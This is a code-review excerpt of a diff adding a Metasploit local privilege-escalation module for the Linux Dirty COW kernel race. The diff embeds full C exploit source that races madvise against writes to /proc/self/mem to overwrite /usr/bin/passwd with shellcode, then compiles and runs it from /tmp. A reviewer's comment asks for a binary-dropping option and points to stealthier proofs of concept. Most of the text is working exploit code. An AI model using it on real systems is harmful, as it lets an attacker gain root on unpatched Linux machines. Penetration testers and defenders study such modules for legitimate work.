modules/exploits/linux/local/dirtycow.rb

```diff
@@ -0,0 +1,176 @@
+          ['URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619']
+        ],
+       'Targets' =>
+         [
+           [ 'Linux x86', { 'Arch' => ARCH_X86 }],
+           [ 'Linux x64', { 'Arch' => ARCH_X86_64 }]
+         ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Oct 19 1026'
+    }))
+
+    register_options([
+      OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ])
+    ])
+  end
+
+  def exploit
+    main = %q^
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <string.h>
+#include <unistd.h>
+
+void *map;
+int f;
+int stop = 0;
+struct stat st;
+char *name;
+pthread_t pth1, pth2, pth3;
+
+char suid_binary[] = "/usr/bin/passwd";
+
+SHELLCODE
+
+unsigned int shellcode_size = 0;
+
+
+void *madviseThread(void *arg)
+{
+  char *str;
+  str=(char*)arg;
+  int i, c=0;
+  for(i=0; i<1000000 && !stop; i++) {
+    c += madvise(map,100,MADV_DONTNEED);
+  }
+  printf("thread stopped\n");
+}
+
+void *procselfmemThread(void *arg)
+{
+  char *str;
+  str = (char*)arg;
+  int f=open("/proc/self/mem",O_RDWR);
+  int i, c=0;
+  for(i=0; i<1000000 && !stop; i++) {
+    lseek(f, map, SEEK_SET);
+    c += write(f, str, shellcode_size);
+  }
+  printf("thread stopped\n");
+}
+
+void *waitForWrite(void *arg) {
+  char buf[shellcode_size];
+
+  for(;;) {
+    FILE *fp = fopen(suid_binary, "rb");
+
+    fread(buf, shellcode_size, 1, fp);
+
+    if(memcmp(buf, shellcode, shellcode_size) == 0) {
+      printf("%s overwritten\n", suid_binary);
+      break;
+    }
+
+    fclose(fp);
+    sleep(1);
+  }
+
+  stop = 1;
+  system(suid_binary);
+}
+
+int main(int argc, char *argv[]) {
+  char *backup;
+
+  asprintf(&backup, "cp %s /tmp/bak", suid_binary);
+  system(backup);
+
+  f = open(suid_binary,O_RDONLY);
+  fstat(f,&st);
+
+  char payload[st.st_size];
+  memset(payload, 0x90, st.st_size);
+  memcpy(payload, shellcode, shellcode_size+1);
+
+  map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
+
+  pthread_create(&pth1, NULL, &madviseThread, suid_binary);
+  pthread_create(&pth2, NULL, &procselfmemThread, payload);
+  pthread_create(&pth3, NULL, &waitForWrite, NULL);
+
+  pthread_join(pth3, NULL);
+
+  return 0;
+}
+^
+    payload_file = generate_payload_exe
+    main.gsub!(/SHELLCODE/) do
+      # Split the payload into chunks and dump it out as a hex-escaped
+      # literal C string.
+      Rex::Text.to_c(payload_file, 64, "shellcode")
+    end
+    main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload_file.length}")
+
+    evil_path = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(10)}"
+
+    write_file("#{evil_path}.c", main)
+    print_status("Compiling #{evil_path}.c via gcc")
+
+    output = cmd_exec("/usr/bin/gcc -pthread -o #{evil_path}.out #{evil_path}.c")
```

Comment:
Please add a binary-dropping method as well. It's not ideal, but neither is shelling out to GCC, and you're already writing the source to disk. Preferably, you should have the option of either.

Here's a better alternative to the above, though: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs. Look through the table of PoCs and choose a better one. There are a few that don't write to disk or crash the system.